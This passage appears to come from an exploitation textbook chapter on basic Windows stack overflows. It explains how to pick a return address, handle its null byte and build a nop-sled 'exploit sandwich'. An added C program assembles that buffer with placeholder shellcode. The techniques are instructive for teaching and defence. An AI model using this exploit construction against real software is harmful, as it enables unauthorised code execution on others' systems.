c
... (compiler output removed for brevity) ...
C:\grayhat>get_sp.exe
Stack pointer (ESP): 0x12ff60
On this Windows XP machine, we can reliably use the stack pointer address 0x0012ff60
in this specific situation. Notice, however, that the first byte of the 4-byte pointer address is
0x00 (get_sp.exe doesn't show it explicitly, but it is implied because it prints only 3 bytes).
The strcpy we are about to exploit will stop copying when it hits that null byte (0x00).
Thankfully, the null byte is the first (most significant) byte of the address, and because x86 is
little-endian we reverse the bytes to place the address on the stack (60 ff 12 00), so the null
byte will safely become the last byte passed on the command line. This means we can still pull
off the exploit, but we can't repeat the return address: anything after that first 0x00 would
never be copied. In this case, our exploit sandwich will be a short nop sled, the shellcode, nops
to extend to byte 404, then a single copy of our return address at byte 404.
Figure 11-4 Testing our shellcode to execute the calc.exe command
Chapter 11: Basic Windows Exploits
Building the Exploit Sandwich
Let's go back to our command.pl to build the exploit. For this, you'll want to again copy
and paste the Metasploit shellcode generated earlier. This time, use the Perl-formatted
shellcode on the generated shellcode result page to save yourself some reformatting.
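The sandwich layout described above, written out as an added C example (this is not the book's command.pl and not Metasploit output). It packs 0x0012ff60 little-endian so the 0x00 lands last, pads with nops up to the return address slot, and shows with strlen-style scanning why a second copy of the address would never be copied by the vulnerable strcpy. Assumptions: the saved return address begins at 0-based offset 404, and the shellcode bytes are constructed INT3 placeholders, not the calc.exe payload.

```c
/* Lay out the exploit sandwich and check what strcpy() would actually deliver.
 * Added example, not code from the book.  Assumptions: the saved return
 * address starts at 0-based offset 404 and the target is the ESP value
 * 0x0012ff60 reported by get_sp.exe. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define RET_OFFSET  404u            /* assumed 0-based offset of the saved return address */
#define RET_ADDR    0x0012ff60u     /* ESP reported by get_sp.exe on the XP machine */
#define NOP         0x90u           /* x86 one-byte nop for the sled and the padding */

/* Stand-in for the Metasploit-generated calc.exe shellcode: constructed
 * placeholder bytes (INT3), NOT a working payload.  The real Perl-formatted
 * shellcode would be pasted here instead. */
static const unsigned char kShellcode[] = { 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc };

/* Store a 32-bit address little-endian, as the CPU reads it from the stack.
 * For 0x0012ff60 this yields 60 ff 12 00: the leading 0x00 of the address
 * becomes the LAST byte written. */
static void put_le32(unsigned char *dst, uint32_t addr)
{
    dst[0] = (unsigned char)(addr & 0xff);
    dst[1] = (unsigned char)((addr >> 8) & 0xff);
    dst[2] = (unsigned char)((addr >> 16) & 0xff);
    dst[3] = (unsigned char)((addr >> 24) & 0xff);
}

/* Build: [sled_len nops][shellcode][nop padding up to RET_OFFSET][ret addr].
 * Returns the total length written (RET_OFFSET + 4), or 0 if the buffer is
 * too small or sled plus shellcode would overrun the return address slot. */
size_t build_sandwich(unsigned char *buf, size_t buf_len, size_t sled_len,
                      const unsigned char *sc, size_t sc_len, uint32_t ret_addr)
{
    if (buf_len < RET_OFFSET + 4 || sled_len + sc_len > RET_OFFSET)
        return 0;
    memset(buf, NOP, RET_OFFSET);            /* sled and trailing padding */
    memcpy(buf + sled_len, sc, sc_len);      /* shellcode inside the sled */
    put_le32(buf + RET_OFFSET, ret_addr);    /* single copy of the address */
    return RET_OFFSET + 4;
}

/* Number of bytes the vulnerable strcpy() copies before it sees 0x00.
 * Everything at or after the first null never reaches the target stack. */
size_t strcpy_visible_len(const unsigned char *buf, size_t len)
{
    size_t i = 0;
    while (i < len && buf[i] != 0)
        i++;
    return i;
}

/* Nonzero if the bytes before the return address slot contain no 0x00,
 * i.e. strcpy carries the whole sled and shellcode across intact. */
int null_free_before_ret(const unsigned char *buf)
{
    return memchr(buf, 0, RET_OFFSET) == NULL;
}

int main(void)
{
    unsigned char buf[RET_OFFSET + 8];
    size_t n = build_sandwich(buf, sizeof buf, 16, kShellcode, sizeof kShellcode, RET_ADDR);
    size_t seen = strcpy_visible_len(buf, n);

    printf("payload bytes: %zu, bytes strcpy copies before the null: %zu\n", n, seen);
    printf("bytes at offset %u: %02x %02x %02x %02x\n", RET_OFFSET,
           buf[RET_OFFSET], buf[RET_OFFSET + 1], buf[RET_OFFSET + 2], buf[RET_OFFSET + 3]);

    /* Why the address cannot be repeated: a second copy sits behind the
     * first copy's 0x00, so strcpy never delivers it. */
    put_le32(buf + RET_OFFSET + 4, RET_ADDR);
    printf("with a second copy appended, strcpy still stops at: %zu\n",
           strcpy_visible_len(buf, RET_OFFSET + 8));
    return 0;
}
```

The visible-length check is the one worth keeping around: run it over any new buffer before firing the exploit, because a stray 0x00 anywhere in the sled or shellcode truncates the copy just as surely as one in the return address does.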